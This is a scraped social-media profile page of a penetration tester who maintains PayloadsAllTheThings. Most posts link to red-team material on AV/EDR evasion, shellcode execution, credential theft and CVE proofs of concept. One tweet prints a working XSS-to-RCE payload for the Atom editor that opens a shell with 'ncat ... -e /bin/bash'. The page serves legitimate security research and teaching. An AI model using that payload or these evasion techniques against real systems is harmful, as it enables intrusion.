Swissky Profile Banner
Swissky Profile
Swissky

@pentest_swissky

Followers
17,812
Following
1,833
Media
329
Statuses
12,176

RedTeam | Pentest Author of PayloadsAllTheThings & SSRFmap

Paris, France
Joined August 2012
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@pentest_swissky
Swissky
5 months
Many of you used 𝗣𝗮𝘆𝗹𝗼𝗮𝗱𝘀𝗔𝗹𝗹𝗧𝗵𝗲𝗧𝗵𝗶𝗻𝗴𝘀, but do you now about the rest of the "𝗔𝗹𝗹𝗧𝗵𝗲𝗧𝗵𝗶𝗻𝗴𝘀" family? 🧐 - 𝗜𝗻𝘁𝗲𝗿𝗻𝗮𝗹𝗔𝗹𝗹𝗧𝗵𝗲𝗧𝗵𝗶𝗻𝗴𝘀: Active Directory & Internal Pentest - 𝗛𝗮𝗿𝗱𝘄𝗮𝗿𝗲𝗔𝗹𝗹𝗧𝗵𝗲𝗧𝗵𝗶𝗻𝗴𝘀: Hardware & IOT 🧵⬇️
1
62
207
@pentest_swissky
Swissky
2 years
PayloadsAllTheThings is now available as a responsive website with a SEARCH bar🔎 Let me know if you like it ! Also big thanks to @TechBrunchFR for the tip and the help on deploying this major upgrade🤗
Tweet media one
22
325
1K
@pentest_swissky
Swissky
5 years
PayloadsAllTheThings is now ready for the Kali Linux repository! 🥂 You can install it with: "apt install payloadsallthethings" Thanks to @g0tmi1k for his incredible work !
11
176
447
@pentest_swissky
Swissky
2 years
It's time for a new repo, introducing HardwareAllTheThings, an equivalent of PayloadsAllTheThings for IOT/Hardware🤖 Send your Pull Requests if you want them to be merged during this Hacktoberfest😏
Tweet media one
7
153
444
@pentest_swissky
Swissky
10 months
Merry Christmas, here is my gift to you 🎁 I'm releasing "Internal All The Things", which contains all my cheatsheets and methodologies for Active Directory, Internal Pentests and Cloud Assessments 🎅
4
147
353
@pentest_swissky
Swissky
4 years
I just released SharpLAPS, a C# binary to retrieve LAPS password from within a Cobalt Strike session. It's raining passwords🤩
1
125
340
@pentest_swissky
Swissky
2 years
ACTIVE DIRECTORY CERTIFICATE SERVICES Cheatsheet - @BlWasp_
5
97
323
@pentest_swissky
Swissky
7 years
🔥XSS -> RCE in Atom, get a shell when rendering the markdown 😀 demo.md: <iframe src="/home/user/demo.html"> demo.html: <script> .require('child_process').execFile('/usr/bin/xterm',['-e', 'ncat 127.0.0.1 4242 -e /bin/bash']); </script> @Zk_Clown
5
138
287
@pentest_swissky
Swissky
5 years
If you find any API key , check this amazing repo from @streaak to know how to use them 👏 ! #bugbountytips
1
120
285
@pentest_swissky
Swissky
4 years
Heap-based AMSI bypass for MS Excel VBA and others
0
130
285
@pentest_swissky
Swissky
2 years
Bypassing EDR real-time injection detection logic
0
94
265
@pentest_swissky
Swissky
2 years
Yours Truly, Signed AV Driver: Weaponizing An Antivirus Driver
2
96
262
@pentest_swissky
Swissky
5 years
Bypass SSL Pinning and intercept HTTPS with Burp with apk-mitm - A CLI application that automatically prepares Android APK files for HTTPS inspection
2
84
255
@pentest_swissky
Swissky
5 years
Wow PayloadAllTheThings reached 10k stars on Github, big thanks to every contributors ! 😍🍾 #RoadTo100k #togetherwehitharder
Tweet media one
7
36
257
@pentest_swissky
Swissky
2 years
How did I miss that! This repository is amazing to emulate several attackers🤩 "A PoC that packages payloads into output containers to evade Mark-of-the-Web flag. Supports: ZIP, 7zip, PDF, ISO, IMG, CAB, VHD, VHDX" - @mariuszbit
2
87
247
@pentest_swissky
Swissky
3 years
Extracting passwords from hiberfil.sys and memory dumps
1
90
234
@pentest_swissky
Swissky
4 years
- Automated multi step offensive attack modules with Infrastructure as Code(IAC)
3
87
235
@pentest_swissky
Swissky
4 years
{ Better } Hacker: The Burp Extension No One Told You About
3
72
223
@pentest_swissky
Swissky
3 years
Engineering antivirus evasion Automatically refactor Meterpreter to bypass every AV/EDR
2
75
226
@pentest_swissky
Swissky
2 years
Subdomain Enumeration Tool Face-off 2022
7
83
219
@pentest_swissky
Swissky
3 years
Attack Detection Fundamentals 2021: Windows - Lab
0
65
210
@pentest_swissky
Swissky
5 years
CVE-2020-0601 - PoC
1
96
208
@pentest_swissky
Swissky
3 years
Evasion techniques - Evasions encyclopedia gathers methods used by malware to evade detection when run in virtualized environment. - @_CPResearch_
1
83
207
@pentest_swissky
Swissky
1 year
Finding 0-day vulnerabilities in apps using the Red Team approach(RTC0005)
2
68
207
@pentest_swissky
Swissky
2 years
How we broke PHP, hacked Pornhub and earned $20,000
4
51
204
@pentest_swissky
Swissky
3 years
Post Compromise Active Directory Checklist
0
75
203
@pentest_swissky
Swissky
2 years
Running Shellcode Through Windows Callbacks via @Marco_Ramilli
0
56
197
@pentest_swissky
Swissky
6 years
Thx @ippsec very nice work in your Youtube playlists. 👏 @hackthebox_eu videos are now sorted by difficulty and OS 🤩
Tweet media one
1
28
186
@pentest_swissky
Swissky
6 years
SSRFmap, an automatic SSRF fuzzer and exploitation tool. Always wanted to scan ports, active machines on the network, and getting a shell on their services via SSRF ? 🤖
1
99
187
@pentest_swissky
Swissky
4 years
WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK
1
73
184
@pentest_swissky
Swissky
2 years
Don't forget to check out this amazing repo ! 😍 Awesome list of techniques to achieve Remote Code Execution on various apps! by @podalirius_
2
54
185
@pentest_swissky
Swissky
2 years
CVE-2022-22005 Microsoft Sharepoint RCE - HoangND
1
75
184
@pentest_swissky
Swissky
3 years
Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - @harmj0y
1
61
183
@pentest_swissky
Swissky
2 years
Warhorse: a fully-featured Ansible playbook to deploy infrastructure in the cloud for conducting security assessments. - @ralphte1
2
49
181
@pentest_swissky
Swissky
1 year
is not working anymore... Long live 👑
Tweet media one
3
66
178
@pentest_swissky
Swissky
2 years
Stealing Access Tokens From Office Desktop Applications - @mrd0x
1
52
167
@pentest_swissky
Swissky
4 years
Almost 15k ⭐️ on PayloadsAllTheThings🥳, let's unveil the new logo ! Big thank you to all the contributors 👏
Tweet media one
2
37
164
@pentest_swissky
Swissky
4 years
Abusing native Windows functions for shellcode execution
1
86
168
@pentest_swissky
Swissky
4 years
Persistence using Task Scheduler without a Scheduled Task
0
78
166
@pentest_swissky
Swissky
2 years
Maelstrom: EDR Kernel Callbacks, Hooks, and Call Stacks
0
62
163
@pentest_swissky
Swissky
3 years
Reverse shells via Dart: AV bypass with zero effort
1
74
156
@pentest_swissky
Swissky
1 year
Tweet media one
5
26
154